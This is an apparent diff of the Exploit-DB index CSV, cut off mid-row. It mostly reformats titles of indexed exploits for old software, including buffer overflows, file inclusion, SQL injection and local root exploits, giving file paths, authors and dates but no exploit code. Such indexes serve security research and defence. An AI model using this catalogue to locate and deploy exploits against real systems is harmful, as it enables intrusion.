Support Buffer Overflow Vulnerability (Metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0 20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (1)",2001-06-21,"Luca Ercoli",linux,dos,0 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (2)",2001-06-21,mu-b,linux,remote,0 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (3)",2006-10-06,mu-b,linux,remote,0 @@ -18278,7 +18278,7 @@ id,file,description,date,author,platform,type,port 20976,platforms/hardware/remote/20976.c,"Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (2)",2001-06-27,"Eliel C. Sardanons",hardware,remote,0 20977,platforms/hardware/remote/20977.pl,"Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (3)",2001-03-07,hypoclear,hardware,remote,0 20978,platforms/hardware/remote/20978.pl,"Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (4)",2001-06-27,blackangels,hardware,remote,0 -20979,platforms/linux/local/20979.c,"Linux kernel 2.2/2.4 procfs Stream Redirection to Process Memory Vulnerability",2001-06-27,zen-parse,linux,local,0 +20979,platforms/linux/local/20979.c,"Linux kernel 2.2/2.4 - procfs Stream Redirection to Process Memory Vulnerability",2001-06-27,zen-parse,linux,local,0 20980,platforms/windows/remote/20980.c,"Oracle 8i TNS Listener Buffer Overflow Vulnerability",2001-07-20,benjurry,windows,remote,0 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 20982,platforms/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution Vulnerability",2001-06-28,"Igor Dobrovitski",cgi,remote,0 @@ -18287,7 +18287,7 @@ id,file,description,date,author,platform,type,port 20985,platforms/php/local/20985.php,"PHP 4.x SafeMode Arbitrary File Execution Vulnerability",2001-06-30,"Wojciech Purczynski",php,local,0 20986,platforms/linux/local/20986.c,"Xvt 2.1 - Buffer Overflow Vulnerability",2001-07-02,"Christophe Bailleux",linux,local,0 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure Vulnerability",2001-07-02,sween,asp,webapps,0 -20988,platforms/linux/local/20988.c,"CylantSecure 1.0 Kernel Module Syscall Rerouting Vulnerability",2001-06-29,"Juergen Pabel",linux,local,0 +20988,platforms/linux/local/20988.c,"CylantSecure 1.0 - Kernel Module Syscall Rerouting Vulnerability",2001-06-29,"Juergen Pabel",linux,local,0 20989,platforms/windows/dos/20989.txt,"Microsoft IIS 4.0/5.0 Device File Local DoS Vulnerability",2001-07-04,VIPER_SV,windows,dos,0 20990,platforms/linux/local/20990.c,"teTeX 1.0.7 Filters Temporary File Race Condition Vulnerability",2001-06-22,zen-parse,linux,local,0 20991,platforms/windows/dos/20991.txt,"Microsoft IIS 4.0/5.0 Device File Remote DoS Vulnerability",2001-07-04,VIPER_SV,windows,dos,0 @@ -18296,7 +18296,7 @@ id,file,description,date,author,platform,type,port 20994,platforms/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability",2001-07-04,"Andrea Barisani",linux,remote,0 20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal Vulnerability",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 File Disclosure Vulnerability",2001-07-06,"karol _",php,webapps,0 -20997,platforms/multiple/dos/20997.c,"HP-UX 11_Linux kernel 2.4_Windows 2000/NT 4.0_IRIX 6.5 Small TCP MSS DoS",2001-07-07,"Darren Reed",multiple,dos,0 +20997,platforms/multiple/dos/20997.c,"HP-UX 11_Linux kernel 2.4_Windows 2000/NT 4.0_IRIX 6.5 - Small TCP MSS DoS",2001-07-07,"Darren Reed",multiple,dos,0 20998,platforms/linux/remote/20998.c,"xloadimage 4.1 - Buffer Overflow Vulnerability",2001-07-10,"zenith parsec",linux,remote,0 20999,platforms/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (1)",2001-07-10,"Charles Stevenson",hardware,local,0 21000,platforms/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (2)",2001-07-10,ml85p,hardware,local,0 @@ -18412,9 +18412,9 @@ id,file,description,date,author,platform,type,port 21119,platforms/php/webapps/21119.txt,"PostNuke 0.6 Unauthenticated User Login Vulnerability",2001-10-13,anonymous,php,webapps,0 21120,platforms/unix/local/21120.c,"Snes9x 1.3 - Local Buffer Overflow Vulnerability",2001-10-16,"Niels Heinen",unix,local,0 21121,platforms/windows/remote/21121.pl,"Oracle9iAS Web Cache 2.0 - Buffer Overflow Vulnerability",2001-10-18,andreas,windows,remote,0 -21122,platforms/linux/dos/21122.sh,"Linux kernel 2.2/2.4 Deep Symbolic Link Denial of Service Vulnerability",2001-10-18,Nergal,linux,dos,0 +21122,platforms/linux/dos/21122.sh,"Linux kernel 2.2/2.4 - Deep Symbolic Link Denial of Service Vulnerability",2001-10-18,Nergal,linux,dos,0 21123,platforms/windows/dos/21123.txt,"Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability",2001-10-18,"Luciano Martins",windows,dos,0 -21124,platforms/linux/local/21124.txt,"Linux Kernel 2.2/2.4 Ptrace/Setuid Exec Vulnerability",2001-10-18,"Rafal Wojtczuk",linux,local,0 +21124,platforms/linux/local/21124.txt,"Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Vulnerability",2001-10-18,"Rafal Wojtczuk",linux,local,0 21125,platforms/cgi/remote/21125.pl,"Mountain Network Systems WebCart 8.4 Command Execution Vulnerability",2001-10-19,root@xpteam.f2s.com,cgi,remote,0 21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 Connection Close State Denial of Service Vulnerability",2001-10-23,awayzzz,multiple,dos,0 21127,platforms/windows/remote/21127.txt,"Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing Vulnerability",2001-10-21,"Georgi Guninski",windows,remote,0 @@ -18632,7 +18632,7 @@ id,file,description,date,author,platform,type,port 21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability",2002-03-21,SPAX,windows,remote,0 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 Weak Password Encryption Vulnerability",2002-03-22,c3rb3r,windows,local,0 21352,platforms/cgi/webapps/21352.txt,"DCShop Beta 1.0 Form Manipulation Vulnerability",2002-03-25,"pokleyzz sakamaniaka",cgi,webapps,0 -21353,platforms/linux/local/21353.c,"Linux Kernel 2.2.x/2.3/2.4.x d_path() Path Truncation Vulnerability",2002-03-26,cliph,linux,local,0 +21353,platforms/linux/local/21353.c,"Linux Kernel 2.2.x/2.3/2.4.x - d_path() Path Truncation Vulnerability",2002-03-26,cliph,linux,local,0 21354,platforms/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution Vulnerability",2002-03-26,"Steve Gustin",cgi,remote,0 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting Vulnerability",2002-03-27,"Eric Detoisien",jsp,remote,0 21356,platforms/linux/local/21356.sh,"LogWatch 2.1.1/2.5 Insecure Temporary Directory Creation Vulnerability",2002-03-27,spybreak,linux,local,0 @@ -18737,7 +18737,7 @@ id,file,description,date,author,platform,type,port 21455,platforms/asp/webapps/21455.txt,"Hosting Controller 1.x DSNManager Directory Traversal Vulnerability",2002-05-17,hdlkha,asp,webapps,0 21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access Vulnerability",2002-05-17,"Andrew Lopacki",hardware,remote,0 21457,platforms/asp/webapps/21457.txt,"Hosting Controller 1.4 Import Root Directory Command Execution Vulnerability",2002-05-17,hdlkha,asp,webapps,0 -21458,platforms/linux/local/21458.txt,"grsecurity Kernel Patch 1.9.4 Linux Kernel Memory Protection Weakness",2002-05-17,"Guillaume PELAT",linux,local,0 +21458,platforms/linux/local/21458.txt,"grsecurity Kernel Patch 1.9.4 - Linux Kernel Memory Protection Weakness",2002-05-17,"Guillaume PELAT",linux,local,0 21459,platforms/php/webapps/21459.txt,"Phorum 3.3.2 a Remote Command Execution Vulnerability",2002-05-17,"markus arndt",php,webapps,0 21460,platforms/cgi/webapps/21460.pl,"CGIScript.net 1.0 Information Disclosure Vulnerability",2002-05-17,"Steve Gustin",cgi,webapps,0 21461,platforms/php/webapps/21461.txt,"Phorum 3.3.2 - Cross-Site Scripting Vulnerabilities",2002-05-18,"markus arndt",php,webapps,0 @@ -19068,8 +19068,8 @@ id,file,description,date,author,platform,type,port 21793,platforms/linux/local/21793.txt,"BRU 17.0 XBRU Insecure Temporary File Vulnerability",2002-09-13,prophecy,linux,local,0 21794,platforms/windows/remote/21794.txt,"Savant Webserver 3.1 File Disclosure Vulnerability",2002-09-13,"Auriemma Luigi",windows,remote,0 21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 Long GET Request Buffer Overflow Vulnerability",2002-09-16,UkR-XblP,windows,dos,0 -21796,platforms/unix/local/21796.txt,"BubbleMon 1.x Kernel Memory File Descriptor Leakage Vulnerability",2002-09-16,badc0ded,unix,local,0 -21797,platforms/unix/local/21797.txt,"ASCPU 0.60 Kernel Memory File Descriptor Leakage Vulnerability",2002-09-16,badc0ded,unix,local,0 +21796,platforms/unix/local/21796.txt,"BubbleMon 1.x Kernel - Memory File Descriptor Leakage Vulnerability",2002-09-16,badc0ded,unix,local,0 +21797,platforms/unix/local/21797.txt,"ASCPU 0.60 Kernel - Memory File Descriptor Leakage Vulnerability",2002-09-16,badc0ded,unix,local,0 21798,platforms/freebsd/local/21798.txt,"WMMon 1.0 b2 Memory Character File Open File Descriptor Read Vulnerability",2002-09-16,badc0ded,freebsd,local,0 21799,platforms/freebsd/local/21799.txt,"WMNet2 1.0 6 Kernel Memory File Descriptor Leakage Vulnerability",2002-09-16,badc0ded,freebsd,local,0 21800,platforms/multiple/remote/21800.txt,"DB4Web 3.4/3.6 File Disclosure Vulnerability",2002-09-17,"Stefan Bagdohn",multiple,remote,0 @@ -19390,7 +19390,7 @@ id,file,description,date,author,platform,type,port 22128,platforms/linux/local/22128.c,"H-Sphere Webshell 2.4 - Local Root Exploit",2003-01-06,"Carl Livitt",linux,local,0 22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Root Exploit",2003-01-06,"Carl Livitt",linux,remote,0 22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e Cross-Site Scripting Vulnerability",2003-01-06,D4rkGr3y,multiple,remote,0 -22131,platforms/unix/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x_FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",unix,remote,0 +22131,platforms/unix/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x_FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",unix,remote,0 22132,platforms/windows/dos/22132.txt,"Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability",2003-01-06,andrew,windows,dos,0 22133,platforms/php/webapps/22133.txt,"myPHPNuke 1.8.8 - Default_Theme Cross-Site Scripting Vulnerability",2003-01-06,Mindwarper,php,webapps,0 22134,platforms/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution Vulnerability",2003-01-06,nmsh_sa,php,webapps,0 @@ -19708,7 +19708,7 @@ id,file,description,date,author,platform,type,port 22455,platforms/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router Rule Bypass Vulnerability",2003-04-03,stickler,hardware,remote,0 22456,platforms/linux/local/22456.txt,"AutomatedShops WebC 2.0/5.0 Symbolic Link Following Configuration File Weakness",2003-04-03,"Carl Livitt",linux,local,0 22457,platforms/php/webapps/22457.txt,"PHPSysInfo 2.0/2.1 Index.PHP File Disclosure Vulnerability",2003-04-03,"Albert Puigsech Galicia",php,webapps,0 -22458,platforms/linux/local/22458.c,"Linux kernel 2.2.x/2.4.x I/O System Call File Existence Weakness",2003-04-04,"Andrew Griffiths",linux,local,0 +22458,platforms/linux/local/22458.c,"Linux kernel 2.2.x/2.4.x - I/O System Call File Existence Weakness",2003-04-04,"Andrew Griffiths",linux,local,0 22459,platforms/php/webapps/22459.txt,"PHPSysInfo 2.0/2.1 Index.PHP LNG File Disclosure Vulnerability",2003-04-04,"Albert Puigsech Galicia",php,webapps,0 22460,platforms/windows/dos/22460.txt,"Abyss Web Server 1.1.2 Incomplete HTTP Request Denial of Service Vulnerability",2003-04-05,"Auriemma Luigi",windows,dos,0 22461,platforms/php/webapps/22461.txt,"Invision Board 1.1.1 functions.php SQL Injection Vulnerability",2003-04-05,"Gossi The Dog",php,webapps,0 @@ -20055,7 +20055,7 @@ id,file,description,date,author,platform,type,port 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x Search Module Cross-Site Scripting Vulnerability",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 Command-Line Argument Buffer Overflow Vulnerability",2003-06-19,Matrix_DK,bsd,local,0 22812,platforms/php/webapps/22812.txt,"WebJeff Filemanager 1.6 File Disclosure Vulnerability",2003-06-20,"Adam Stephens",php,webapps,0 -22813,platforms/linux/local/22813.c,"Linux kernel 2.2./2.4.x /proc Filesystem Potential Information Disclosure Vulnerability",2003-06-20,IhaQueR,linux,local,0 +22813,platforms/linux/local/22813.c,"Linux kernel 2.2./2.4.x - /proc Filesystem Potential Information Disclosure Vulnerability",2003-06-20,IhaQueR,linux,local,0 22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 PR-Edit Command Line Option Heap Corruption Vulnerablity",2003-06-21,"dong-h0un U",linux,dos,0 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 Environment Variable Buffer Overflow Vulnerability",2003-06-21,Xpl017Elz,linux,local,0 22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI ActiveX Control Buffer Overflow Vulnerability",2003-06-23,"Cesar Cerrudo",windows,dos,0 @@ -20538,7 +20538,7 @@ id,file,description,date,author,platform,type,port 23306,platforms/linux/remote/23306.c,"thttpd 2.2x defang Remote Buffer Overflow Vulnerability (2)",2003-10-27,d3ck4,linux,remote,0 23307,platforms/multiple/remote/23307.txt,"Fastream NetFile 6.0.3.588 - Error Message Cross-Site Scripting Vulnerability",2003-10-28,"Oliver Karow",multiple,remote,0 23308,platforms/linux/local/23308.c,"kpopup 0.9.x - Privileged Command Execution Vulnerability",2003-10-28,b0f,linux,local,0 -23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass 7.1 HTTP Server Directory Disclosure Vulnerability",2003-10-28,"Richard Maudsley",multiple,remote,0 +23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass 7.1 - HTTP Server Directory Disclosure Vulnerability",2003-10-28,"Richard Maudsley",multiple,remote,0 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 HTTP Referer Remote Buffer Overflow Vulnerability",2003-10-29,"Oliver Karow",windows,dos,0 23311,platforms/php/dos/23311.txt,"E107 - Chatbox.php Denial of Service Vulnerability",2003-10-29,Blademaster,php,dos,0 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 Input Validation Vulnerability",2003-10-30,"Corsaire Limited",cgi,remote,0 @@ -20876,7 +20876,7 @@ id,file,description,date,author,platform,type,port 23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation Vulnerability",2004-02-05,"Joost Pol",bsd,local,0 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x Database Parameter/Statement Buffer Overflow Vulnerabilities",2003-02-05,NGSSoftware,multiple,dos,0 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 Itemid Parameter Cross-Site Scripting Vulnerability",2004-02-05,"David Sopas Ferreira",php,webapps,0 -23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x CHRoot Breakout Vulnerability",2004-02-06,"Markus Mueller",linux,local,0 +23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout Vulnerability",2004-02-06,"Markus Mueller",linux,local,0 23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing Vulnerability",2004-02-06,"Tri Huynh",cgi,webapps,0 23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (1)",2004-02-07,shaun2k2,windows,dos,0 23661,platforms/windows/remote/23661.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2)",2004-02-07,Skylined,windows,remote,0 @@ -20973,7 +20973,7 @@ id,file,description,date,author,platform,type,port 23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (3)",2004-02-26,shaun2k2,windows,dos,0 23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (4)",2004-02-26,lion,windows,remote,0 23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 Error Page Cross-Site Scripting Vulnerability",2004-02-26,Soby,hardware,remote,0 -23765,platforms/solaris/local/23765.c,"Sun Solaris 8/9 Unspecified Passwd Local Root Compromise Vulnerability",2004-02-27,"Marco Ivaldi",solaris,local,0 +23765,platforms/solaris/local/23765.c,"Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability",2004-02-27,"Marco Ivaldi",solaris,local,0 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage Vulnerability",2004-02-27,iDefense,windows,remote,0 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability",2003-09-11,Jelmer,windows,remote,0 @@ -21078,7 +21078,7 @@ id,file,description,date,author,platform,type,port 23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 Comments function id Parameter SQL Injection Vulnerability",2004-03-22,JeiAr,php,webapps,0 23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0 23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection Vulnerability",2004-03-22,"Janek Vind",php,webapps,0 -23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 TargetName Parameter Cross-Site Scripting Vulnerability",2004-03-22,"Richard Maudsley",windows,remote,0 +23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting Vulnerability",2004-03-22,"Richard Maudsley",windows,remote,0 23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal Vulnerability",2004-03-22,snifer,jsp,webapps,0 23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x Encryption Key Signing Vulnerability",2004-03-23,"Todd Chapman",multiple,remote,0 23874,platforms/solaris/local/23874.txt,"Sun Solaris 2.6/7.0/8/9 - vfs_getvfssw function Local Privilege Escalation Vulnerability",2004-03-23,"Sinan Eren",solaris,local,0 @@ -22215,7 +22215,7 @@ id,file,description,date,author,platform,type,port 25052,platforms/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation Vulnerability (1)",2005-01-19,"Noam Rathaus",php,webapps,0 25053,platforms/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation Vulnerability (2)",2005-01-19,amironline452,php,webapps,0 25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0 -25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 Mach File Parsing Local Integer Overflow Vulnerability",2005-01-19,nemo@felinemenace.org,osx,local,0 +25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow Vulnerability",2005-01-19,nemo@felinemenace.org,osx,local,0 25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 Infinite Array Sort Denial of Service Vulnerability",2005-01-21,"Berend-Jan Wever",multiple,dos,0 25057,platforms/windows/remote/25057.txt,"DivX Player 2.6 Skin File Directory Traversal Vulnerability",2005-01-21,"Luigi Auriemma",windows,remote,0 25058,platforms/php/webapps/25058.txt,"Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps,0 @@ -25421,7 +25421,7 @@ id,file,description,date,author,platform,type,port 28355,platforms/php/webapps/28355.txt,"VWar 1.5 news.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28356,platforms/php/webapps/28356.txt,"VWar 1.5 stats.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28357,platforms/windows/remote/28357.asc,"Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution Vulnerability",2006-07-27,"Plebo Aesdi Nael",windows,remote,0 -28358,platforms/linux/dos/28358.txt,"Linux Kernel NFS and EXT3 Combination Remote Denial of Service Vulnerability",2006-08-07,"James McKenzie",linux,dos,0 +28358,platforms/linux/dos/28358.txt,"Linux Kernel - NFS and EXT3 Combination Remote Denial of Service Vulnerability",2006-08-07,"James McKenzie",linux,dos,0 28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 Index.php Remote File Include Vulnerability",2006-08-07,sh3ll,php,webapps,0 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 Security Restriction Bypass Vulnerability",2006-08-07,"Mobin Yazarlou",windows,remote,0 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 HES Files Remote Heap Buffer Overflow Vulnerability",2006-08-07,"Luigi Auriemma",multiple,dos,0 @@ -26207,8 +26207,8 @@ id,file,description,date,author,platform,type,port 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 ticketview.php Multiple Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0 29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 ticket.php email Parameter XSS",2006-11-22,SwEET-DeViL,php,webapps,0 29167,platforms/windows/remote/29167.rb,"NetGear WG311v1 Wireless Driver 2.3.1 - 10 SSID Heap Buffer Overflow Vulnerability",2006-11-22,"Laurent Butti",windows,remote,0 -29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 - SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 - SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri giris.asp Multiple Field SQL Injection",2006-12-01,ShaFuq31,asp,webapps,0 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 Keystone.EXE Local Denial of Service Vulnerability",2006-11-23,Hessam-x,windows,dos,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional File Handling Buffer Overflow Vulnerability",2006-11-23,LSsec.com,windows,remote,0 @@ -26330,8 +26330,8 @@ id,file,description,date,author,platform,type,port 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0 29316,platforms/php/remote/29316.py,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0 -29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 - Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution",2013-10-31,metasploit,php,remote,80 29320,platforms/php/remote/29320.rb,"NAS4Free - Arbitrary Remote Code Execution",2013-10-31,metasploit,php,remote,80 @@ -26943,7 +26943,7 @@ id,file,description,date,author,platform,type,port 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins - Remote File Upload Vulnerability",2013-11-26,link_satisi,php,webapps,0 -29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0 +29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - DSKernel2.DLL ActiveX Control Stack Buffer Overflow Vulnerabilities",2007-05-07,shinnai,windows,remote,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 @@ -27068,41 +27068,41 @@ id,file,description,date,author,platform,type,port 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.PHP Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow Vulnerability",2007-05-07,MC,windows,remote,0 29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.PHP Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0 -29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 Alias.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 Article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29969,platforms/php/webapps/29969.txt,"Campsite 2.6.1 ArticleComment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29970,platforms/php/webapps/29970.txt,"Campsite 2.6.1 ArticleData.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29971,platforms/php/webapps/29971.txt,"Campsite 2.6.1 ArticleImage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29972,platforms/php/webapps/29972.txt,"Campsite 2.6.1 ArticleIndex.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29973,platforms/php/webapps/29973.txt,"Campsite 2.6.1 ArticlePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29974,platforms/php/webapps/29974.txt,"Campsite 2.6.1 ArticleTopic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29975,platforms/php/webapps/29975.txt,"Campsite 2.6.1 ArticleType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29976,platforms/php/webapps/29976.txt,"Campsite 2.6.1 ArticleTypeField.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29977,platforms/php/webapps/29977.txt,"Campsite 2.6.1 Country.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29978,platforms/php/webapps/29978.txt,"Campsite 2.6.1 DatabaseObject.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 - Alias.php 